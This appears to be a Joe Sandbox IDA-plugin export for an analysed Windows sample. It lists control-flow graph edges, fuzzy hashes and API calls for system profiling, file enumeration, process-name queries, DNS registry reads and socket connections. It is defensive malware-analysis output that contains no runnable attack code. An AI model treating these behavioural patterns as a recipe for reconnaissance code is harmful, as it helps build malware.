20090->20094 20091->20089 20091->20090 20092->20089 20096 3e0847 20092->20096 20098 3e6fa0 20092->20098 20094->20090 20095 3e09e8 WSAEnumNetworkEvents 20095->20096 20097 3e09d0 WSAEventSelect 20095->20097 20096->20089 20096->20095 20096->20097 20097->20095 20097->20096 20099 3e6fd4 20098->20099 20101 3e6feb 20098->20101 20100 3e7207 select 20099->20100 20099->20101 20100->20101 20101->20096 20102 484720 20103 484728 20102->20103 20107 484733 20103->20107 20108 489270 20103->20108 20105 484860 20111 484950 20105->20111 20115 48a440 20108->20115 20110 489297 20110->20105 20114 484966 20111->20114 20112 4849c5 20112->20107 20113 484aa0 gethostname 20113->20112 20113->20114 20114->20112 20114->20113 20142 48a46b 20115->20142 20116 48aa03 RegOpenKeyExA 20117 48ab70 RegOpenKeyExA 20116->20117 20118 48aa27 RegQueryValueExA 20116->20118 20119 48ac34 RegOpenKeyExA 20117->20119 20143 48ab90 20117->20143 20120 48aacc RegQueryValueExA 20118->20120 20121 48aa71 20118->20121 20122 48acf8 RegOpenKeyExA 20119->20122 20141 48ac54 20119->20141 20123 48ab0e 20120->20123 20124 48ab66 RegCloseKey 20120->20124 20121->20120 20126 48aa85 RegQueryValueExA 20121->20126 20125 48ad56 RegEnumKeyExA 20122->20125 20130 48ad14 20122->20130 20123->20124 20129 48ab1e RegQueryValueExA 20123->20129 20124->20117 20127 48ad9b 20125->20127 20125->20130 20128 48aab3 20126->20128 20131 48ae16 RegOpenKeyExA 20127->20131 20128->20120 20134 48ab4c 20129->20134 20130->20110 20132 48addf RegEnumKeyExA 20131->20132 20133 48ae34 RegQueryValueExA 20131->20133 20132->20130 20132->20131 20135 48af43 RegQueryValueExA 20133->20135 20136 48adaa 20133->20136 20134->20124 20135->20136 20137 48b052 RegQueryValueExA 20135->20137 20136->20135 20136->20137 20138 48adc7 RegCloseKey 20136->20138 20140 48afa0 RegQueryValueExA 20136->20140 20137->20136 20137->20138 20138->20132 20139 48a4db 20139->20116 20139->20130 20140->20136 20141->20122 20142->20139 20144 48a794 GetBestRoute2 20142->20144 20145 48a6c7 GetBestRoute2 
20142->20145 20143->20119 20144->20142 20145->20142 19982 49a8c0 19983 49a903 recvfrom 19982->19983 19984 49a8e6 19982->19984 19985 49a8ed 19983->19985 19984->19983 19984->19985 19986 49a080 19989 499740 19986->19989 19988 49a09b 19990 499780 19989->19990 19994 49975d 19989->19994 19991 499925 RegOpenKeyExA 19990->19991 19990->19994 19992 49995a RegQueryValueExA 19991->19992 19991->19994 19993 499986 RegCloseKey 19992->19993 19993->19994 19994->19988 19995 49b180 19996 49b19b 19995->19996 19997 49b2e3 19995->19997 19996->19997 20000 49b2a9 getsockname 19996->20000 20002 49b020 closesocket 19996->20002 20003 49af30 19996->20003 20007 49b060 19996->20007 20012 49b020 20000->20012 20002->19996 20004 49af4c 20003->20004 20005 49af63 socket 20003->20005 20004->20005 20006 49af52 20004->20006 20005->19996 20006->19996 20009 49b080 20007->20009 20008 49b0b0 connect 20010 49b0bf WSAGetLastError 20008->20010 20009->20008 20009->20010 20011 49b0ea 20009->20011 20010->20009 20010->20011 20011->19996 20013 49b029 20012->20013 20014 49b052 20012->20014 20015 49b04b closesocket 20013->20015 20016 49b03e 20013->20016 20014->19996 20015->20014 20016->19996 20146 49a920 20147 49a944 20146->20147 20148 49a977 send 20147->20148 20149 49a94b 20147->20149 20150 3d2f17 20157 3d2f2c 20150->20157 20151 3d31d3 20152 3d2fb3 RegOpenKeyExA 20152->20157 20153 3d315c RegEnumKeyExA 20153->20157 20154 3d3046 RegOpenKeyExA 20155 3d3089 RegQueryValueExA 20154->20155 20154->20157 20156 3d313b RegCloseKey 20155->20156 20155->20157 20156->20157 20157->20151 20157->20152 20157->20153 20157->20154 20157->20156 20158 3d31d7 20161 3d31f4 20158->20161 20159 3d3200 20160 3d32dc CloseHandle 20160->20159 20161->20159 20161->20160 20017 408b50 20018 408b6b 20017->20018 20031 408bb5 20017->20031 20018->20031 20033 408b8f 20018->20033 20034 40a550 20018->20034 20020 408bfc 20024 408c35 20020->20024 20025 408c1f connect 20020->20025 20029 408cb2 20020->20029 20020->20031 20021 408cd9 SleepEx getsockopt 20022 
408d18 20021->20022 20026 408d43 20022->20026 20022->20029 20023 40a150 getsockname 20032 408dff 20023->20032 20047 40a150 20024->20047 20025->20024 20030 40a150 getsockname 20026->20030 20029->20023 20029->20031 20029->20032 20030->20031 20032->20031 20051 3d78b0 closesocket 20032->20051 20033->20021 20033->20029 20033->20031 20035 40a575 20034->20035 20039 40a597 20035->20039 20053 3d75e0 20035->20053 20037 3d78b0 closesocket 20038 40a713 20037->20038 20038->20020 20040 40a811 setsockopt 20039->20040 20045 40a69b 20039->20045 20046 40a83b 20039->20046 20040->20046 20042 40af56 20043 40af5d 20042->20043 20042->20045 20043->20038 20044 40a150 getsockname 20043->20044 20044->20038 20045->20037 20045->20038 20046->20045 20058 4367e0 ioctlsocket 20046->20058 20048 40a15f 20047->20048 20050 40a1d0 20047->20050 20049 40a181 getsockname 20048->20049 20048->20050 20049->20050 20050->20033 20052 3d78c5 20051->20052 20052->20031 20054 3d7607 socket 20053->20054 20056 3d75ef 20053->20056 20055 3d762b 20054->20055 20055->20039 20056->20054 20057 3d7643 20056->20057 20057->20039 20058->20042 20059 3d20ad 20061 3d20d9 20059->20061 20060 3d20e3 20061->20060 20063 75b180 Sleep 20061->20063 20063->20061 20162 4095b0 20163 4095c8 20162->20163 20165 4095fd 20162->20165 20164 40a150 getsockname 20163->20164 20163->20165 20164->20165 20064 3ed5e0 20065 3ed652 WSAStartup 20064->20065 20066 3ed5f0 20064->20066 20065->20066
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2203142510.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                          • Associated: 00000000.00000002.2203124216.00000000003D0000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203142510.0000000000941000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203142510.0000000000AA7000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203142510.0000000000AA9000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203611507.0000000000AAC000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203627232.0000000000AAE000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203627232.0000000000C37000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203627232.0000000000D47000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203627232.0000000000D4E000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203627232.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203627232.0000000000E35000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203627232.0000000000E43000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203917477.0000000000E44000.00000080.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2204035033.0000000000FFC000.00000040.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_3d0000_A3nofpjN9A.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: %s assess started=%d, result=%d$%s connect -> %d, connected=%d$%s connect timeout after %lldms, move on!$%s done$%s starting (timeout=%lldms)$%s trying next$Connected to %s (%s) port %u$Connection time-out$Connection timeout after %lld ms$Failed to connect to %s port %u after %lld ms: %s$all eyeballers failed$connect.c$created %s (timeout %lldms)$ipv4$ipv6
                                                          • API String ID: 0-1590685507
                                                          • Opcode ID: 1777059f53f099e8739c5aa5917f5856cc92a5dd48e5e48291d0cfa55bb4e9cc
                                                          • Instruction ID: 8959e1a40b15894186e4172d3c41a475c92c306941db5052e74adaf4f0cf68ab
                                                          • Opcode Fuzzy Hash: 1777059f53f099e8739c5aa5917f5856cc92a5dd48e5e48291d0cfa55bb4e9cc
                                                          • Instruction Fuzzy Hash: 7FC27D31A043449FD724CF29C444B6BB7E1AF84314F08867EEC98AB792D775E989CB85

                                                          Control-flow Graph

                                                          APIs
                                                          • GetSystemInfo.KERNELBASE ref: 003D2579
                                                          • GlobalMemoryStatusEx.KERNELBASE ref: 003D25CC
                                                          • GetDriveTypeA.KERNELBASE ref: 003D2647
                                                          • GetDiskFreeSpaceExA.KERNELBASE ref: 003D267E
                                                          • KiUserCallbackDispatcher.NTDLL ref: 003D27E2
                                                          • FindFirstFileW.KERNELBASE ref: 003D28F8
                                                          • FindNextFileW.KERNELBASE ref: 003D291F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2203142510.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                          • Associated: 00000000.00000002.2203124216.00000000003D0000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203142510.0000000000941000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203142510.0000000000AA7000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203142510.0000000000AA9000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203611507.0000000000AAC000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203627232.0000000000AAE000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203627232.0000000000C37000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203627232.0000000000D47000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203627232.0000000000D4E000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203627232.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203627232.0000000000E35000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203627232.0000000000E43000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203917477.0000000000E44000.00000080.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2204035033.0000000000FFC000.00000040.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_3d0000_A3nofpjN9A.jbxd
                                                          Similarity
                                                          • API ID: FileFind$CallbackDiskDispatcherDriveFirstFreeGlobalInfoMemoryNextSpaceStatusSystemTypeUser
                                                          • String ID: ;%=$@$`
                                                          • API String ID: 3271271169-3939046150
                                                          • Opcode ID: 23fc76065ed2a789368ef7fb7211b92c02e1b12c54a22115e91e5df582c58967
                                                          • Instruction ID: eefd0b5ad3a15b339226a74a0023e47ae7ed2dfb7147f3faa0accc5163c74c34
                                                          • Opcode Fuzzy Hash: 23fc76065ed2a789368ef7fb7211b92c02e1b12c54a22115e91e5df582c58967
                                                          • Instruction Fuzzy Hash: ECD182B49083199FCB50EF68C58569EBBF0FF44344F018969E898D7251E7749A88CF92

                                                          Control-flow Graph

                                                          control_flow_graph 1360 3d29ff-3d2a2f FindFirstFileA 1361 3d2a38 1360->1361 1362 3d2a31-3d2a36 1360->1362 1363 3d2a3d-3d2a91 call 859c50 call 859ce0 RegOpenKeyExA 1361->1363 1362->1363 1368 3d2a9a 1363->1368 1369 3d2a93-3d2a98 1363->1369 1370 3d2a9f-3d2b0c call 859c50 call 859ce0 CharUpperA call 758da0 1368->1370 1369->1370 1378 3d2b0e-3d2b13 1370->1378 1379 3d2b15 1370->1379 1380 3d2b1a-3d2b92 call 859c50 call 859ce0 call 758e80 call 758e70 1378->1380 1379->1380 1389 3d2bcc-3d2c66 QueryFullProcessImageNameA CloseHandle call 758da0 1380->1389 1390 3d2b94-3d2ba3 1380->1390 1400 3d2c6f 1389->1400 1401 3d2c68-3d2c6d 1389->1401 1393 3d2ba5-3d2bae 1390->1393 1394 3d2bb0-3d2bca call 758e68 1390->1394 1393->1389 1394->1389 1394->1390 1402 3d2c74-3d2ce9 call 859c50 call 859ce0 call 758e80 call 758e70 1400->1402 1401->1402 1411 3d2dcf-3d2e1c call 859c50 call 859ce0 CloseHandle 1402->1411 1412 3d2cef-3d2d49 call 758bb0 call 758da0 1402->1412 1422 3d2e23-3d2e2e 1411->1422 1423 3d2d99-3d2dad 1412->1423 1424 3d2d4b-3d2d63 call 758da0 1412->1424 1425 3d2e37 1422->1425 1426 3d2e30-3d2e35 1422->1426 1423->1411 1424->1423 1432 3d2d65-3d2d7d call 758da0 1424->1432 1428 3d2e3c-3d2ed6 call 859c50 call 859ce0 1425->1428 1426->1428 1441 3d2ed8-3d2ee1 1428->1441 1442 3d2eea 1428->1442 1432->1423 1438 3d2d7f-3d2d97 call 758da0 1432->1438 1438->1423 1446 3d2daf-3d2dc9 call 758e68 1438->1446 1441->1442 1444 3d2ee3-3d2ee8 1441->1444 1445 3d2eef-3d2f16 call 859c50 call 859ce0 1442->1445 1444->1445 1446->1411 1446->1412
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2203142510.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                          • Associated: 00000000.00000002.2203124216.00000000003D0000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203142510.0000000000941000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203142510.0000000000AA7000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203142510.0000000000AA9000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203611507.0000000000AAC000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203627232.0000000000AAE000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203627232.0000000000C37000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203627232.0000000000D47000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203627232.0000000000D4E000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203627232.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203627232.0000000000E35000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203627232.0000000000E43000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203917477.0000000000E44000.00000080.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2204035033.0000000000FFC000.00000040.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_3d0000_A3nofpjN9A.jbxd
                                                          Similarity
                                                          • API ID: CloseHandle$CharFileFindFirstFullImageNameOpenProcessQueryUpper
                                                          • String ID: 0
                                                          • API String ID: 2406880114-4108050209
                                                          • Opcode ID: ec9df7871a6d2267509419cece600126b96447b060821aa4b752261974cbda91
                                                          • Instruction ID: 956f0acf3ac7dfe95af65b6ea557142c9cde1016dc57dc96f00db734f3e3580b
                                                          • Opcode Fuzzy Hash: ec9df7871a6d2267509419cece600126b96447b060821aa4b752261974cbda91
                                                          • Instruction Fuzzy Hash: 6EE1D6B4908305DFCB50EF68D985A9EBBF4EF58345F01886AE898D7350E7749A48CF42

                                                          Control-flow Graph (graph rendering not recoverable from the export: function entry 3e05b0, calls to WSAEventSelect and WSAEnumNetworkEvents)
                                                          APIs
                                                          • WSAEventSelect.WS2_32(?,?,?), ref: 003E0711
                                                          • WSAEventSelect.WS2_32(?,?,00000000), ref: 003E09DD
                                                          • WSAEnumNetworkEvents.WS2_32(?,00000000,00000000), ref: 003E09FC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2203142510.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                          • Associated: 00000000.00000002.2203124216.00000000003D0000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203142510.0000000000941000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203142510.0000000000AA7000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203142510.0000000000AA9000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203611507.0000000000AAC000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203627232.0000000000AAE000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203627232.0000000000C37000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203627232.0000000000D47000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203627232.0000000000D4E000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203627232.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203627232.0000000000E35000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203627232.0000000000E43000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203917477.0000000000E44000.00000080.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2204035033.0000000000FFC000.00000040.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_3d0000_A3nofpjN9A.jbxd
                                                          Similarity
                                                          • API ID: EventSelect$EnumEventsNetwork
                                                          • String ID: N==$multi.c
                                                          • API String ID: 2170980988-1096619029
                                                          • Opcode ID: 7c85d32cd3eaa17a85e0e645eff08dfc5ac1a29cfa3a2aa2b90ed6489dfb8ab0
                                                          • Instruction ID: b6c430a0327a06733f8539e8b2730cc9c02a5e215a7deaaefcbebd5bf18f5d94
                                                          • Opcode Fuzzy Hash: 7c85d32cd3eaa17a85e0e645eff08dfc5ac1a29cfa3a2aa2b90ed6489dfb8ab0
                                                          • Instruction Fuzzy Hash: AFD106716083819FE716CF61C881B6B77E9FF94344F054A2CF89497292E3B4E985CB52

                                                          Control-flow Graph (graph rendering not recoverable from the export: function entry 49b180, call to getsockname)
                                                          APIs
                                                          • getsockname.WS2_32(-00000020,-00000020,?), ref: 0049B2B7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2203142510.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                          • Associated: 00000000.00000002.2203124216.00000000003D0000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203142510.0000000000941000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203142510.0000000000AA7000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203142510.0000000000AA9000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203611507.0000000000AAC000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203627232.0000000000AAE000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203627232.0000000000C37000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203627232.0000000000D47000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203627232.0000000000D4E000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203627232.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203627232.0000000000E35000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203627232.0000000000E43000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203917477.0000000000E44000.00000080.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2204035033.0000000000FFC000.00000040.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_3d0000_A3nofpjN9A.jbxd
                                                          Similarity
                                                          • API ID: getsockname
                                                          • String ID: ares__sortaddrinfo.c$cur != NULL
                                                          • API String ID: 3358416759-2430778319
                                                          • Opcode ID: 440873400392e013d4d0828aea7b1082e5eaeb740d681588426374989b5a8fd7
                                                          • Instruction ID: 33c22ea00360887357462b90334ef7554ee29fb56cef46543281560f4eb7401d
                                                          • Opcode Fuzzy Hash: 440873400392e013d4d0828aea7b1082e5eaeb740d681588426374989b5a8fd7
                                                          • Instruction Fuzzy Hash: 84C191716043059FDB14DF24DA84A6A7BE1EF88714F05887EE8898B3A1D738ED45CBC5
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2203142510.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                          • Associated: 00000000.00000002.2203124216.00000000003D0000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203142510.0000000000941000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203142510.0000000000AA7000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203142510.0000000000AA9000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203611507.0000000000AAC000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203627232.0000000000AAE000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203627232.0000000000C37000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203627232.0000000000D47000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203627232.0000000000D4E000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203627232.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203627232.0000000000E35000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203627232.0000000000E43000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203917477.0000000000E44000.00000080.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2204035033.0000000000FFC000.00000040.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_3d0000_A3nofpjN9A.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 38e23679ff19fdfd7051f4c5a6a75115703a9469dba58a9850f57536949ee48b
                                                          • Instruction ID: a11aecb887d6af4f53e5e4354830512f7b8576fe3fb6ff998e3c2a76b9ee5f99
                                                          • Opcode Fuzzy Hash: 38e23679ff19fdfd7051f4c5a6a75115703a9469dba58a9850f57536949ee48b
                                                          • Instruction Fuzzy Hash: 8791283060C3A98BD7378A2AC8847BB72D9FFC4364F168B2CE898471D4EB759D41D691
                                                          APIs
                                                          • recvfrom.WS2_32(?,?,?,00000000,00001001,?,?,?,?,?,0048712E,?,?,?,00001001,00000000), ref: 0049A90D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2203142510.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                          • Associated: 00000000.00000002.2203124216.00000000003D0000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203142510.0000000000941000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203142510.0000000000AA7000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203142510.0000000000AA9000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203611507.0000000000AAC000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203627232.0000000000AAE000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203627232.0000000000C37000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203627232.0000000000D47000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203627232.0000000000D4E000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203627232.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203627232.0000000000E35000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203627232.0000000000E43000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203917477.0000000000E44000.00000080.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2204035033.0000000000FFC000.00000040.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_3d0000_A3nofpjN9A.jbxd
                                                          Similarity
                                                          • API ID: recvfrom
                                                          • String ID:
                                                          • API String ID: 846543921-0
                                                          • Opcode ID: 19715340d6ac1877a086ae875830c70a5e6fcc12dbb7179d1fd55c30e908894d
                                                          • Instruction ID: 3fe1875e8b0cee6f5ce80654fbf701fc7a62d4b89225bede511571140ff7f6cc
                                                          • Opcode Fuzzy Hash: 19715340d6ac1877a086ae875830c70a5e6fcc12dbb7179d1fd55c30e908894d
                                                          • Instruction Fuzzy Hash: 0CF06DB5108308AFD6109E01DC48D6BBBEDFFC9758F06496DF948233118270AE10CAB6
                                                          APIs
                                                          • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 0048AA19
                                                          • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 0048AA4C
                                                          • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,?), ref: 0048AA97
                                                          • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 0048AAE9
                                                          • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 0048AB30
                                                          • RegCloseKey.KERNELBASE(?), ref: 0048AB6A
                                                          • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\Windows NT\DNSClient,00000000,00020019,?), ref: 0048AB82
                                                          • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\System\DNSClient,00000000,00020019,?), ref: 0048AC46
                                                          • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces,00000000,00020019,?), ref: 0048AD0A
                                                          • RegEnumKeyExA.KERNELBASE ref: 0048AD8D
                                                          • RegCloseKey.KERNELBASE(?), ref: 0048ADD9
                                                          • RegEnumKeyExA.KERNELBASE ref: 0048AE08
                                                          • RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,?), ref: 0048AE2A
                                                          • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 0048AE54
                                                          • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 0048AF63
                                                          • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 0048AFB2
                                                          • RegQueryValueExA.KERNELBASE(?,DhcpDomain,00000000,00000000,00000000,00000000), ref: 0048B072
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2203142510.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                          • Associated: 00000000.00000002.2203124216.00000000003D0000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203142510.0000000000941000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203142510.0000000000AA7000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203142510.0000000000AA9000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203611507.0000000000AAC000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203627232.0000000000AAE000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203627232.0000000000C37000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203627232.0000000000D47000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203627232.0000000000D4E000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203627232.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203627232.0000000000E35000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203627232.0000000000E43000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203917477.0000000000E44000.00000080.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2204035033.0000000000FFC000.00000040.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_3d0000_A3nofpjN9A.jbxd
                                                          Similarity
                                                          • API ID: QueryValue$Open$CloseEnum
                                                          • String ID: DhcpDomain$Domain$PrimaryDNSSuffix$SearchList$Software\Policies\Microsoft\System\DNSClient$Software\Policies\Microsoft\Windows NT\DNSClient$System\CurrentControlSet\Services\Tcpip\Parameters$System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces
                                                          • API String ID: 4217438148-1047472027
